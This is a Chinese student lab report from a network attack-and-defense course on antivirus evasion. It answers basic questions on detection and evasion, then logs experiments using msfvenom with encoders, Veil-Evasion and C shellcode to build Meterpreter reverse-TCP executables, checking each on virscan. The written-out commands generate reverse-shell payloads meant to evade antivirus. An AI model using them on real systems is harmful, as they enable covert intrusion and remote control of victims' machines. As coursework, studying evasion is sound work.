您的位置:首页 > 理论基础 > 计算机网络

20145321《网络攻防》免杀原理与实践

2017-03-26 21:34 176 查看

20145321《网络攻防》 免杀原理与实践

基础问题回答

(1)杀软是如何检测出恶意代码的?

某只鸟的行为举动都像鸭子,我们就把这只鸟称为鸭子。对于恶意代码也一样,如果它有恶意行为,杀软就会把这程序看作恶意软件,从而查杀。

另外杀软通过其特征码库,看程序是否含有特征码被匹配,从而判断此程序是否为恶意代码。

(2)免杀是做什么?

免杀是让恶意代码不会被杀毒软件检测查杀的技术。

(3)免杀的基本方法有哪些?

加壳改壳

加花指令

修改内存特征码

实践过程记录

msfvenom直接生成meterpreter可执行文件

1.用命令
生成meterpreter可执行文件




2.用ncat将文件传到windows后用virscan进行检测



Excuse me?难道我就这样做成了免杀实验吗?…然而机智的我是不会被它蒙骗的,一定有什么地方不对!



原来传了个0 byte的文件,尴尬……那我们重新来一次。

重新生成了try2.exe ,再次用virscan网站来检测



检测结果如下:



Msfvenom使用编码器生成meterpreter可执行文件

1.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -b ‘\x00’ LHOST=攻击主机ip LPORT=监听端口 -f exe > xxx.exe

命令生成一次加壳的可执行文件。



再次检测,但好像并没什么用,查杀概率还是一样:



2.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=攻击者ip LPORT=监听端口 -f exe > xxx.exe

编码加壳10次看看效果



效果差不多,感觉依然鸡肋。

使用Veil-Evasion生成可执行文件

直接在终端输入veil-evasion打开软件

输入命令
use python/meterpreter/rev_tcp set LHOST xxx... generate xxx...




继续检测:



被检测到的概率减少了一半。

用Shellcode编程

使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=监听端口号 -f c 生成一个shellcode数组



再次用virscan检测:



可以看到被检测到的概率降低了很多。

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: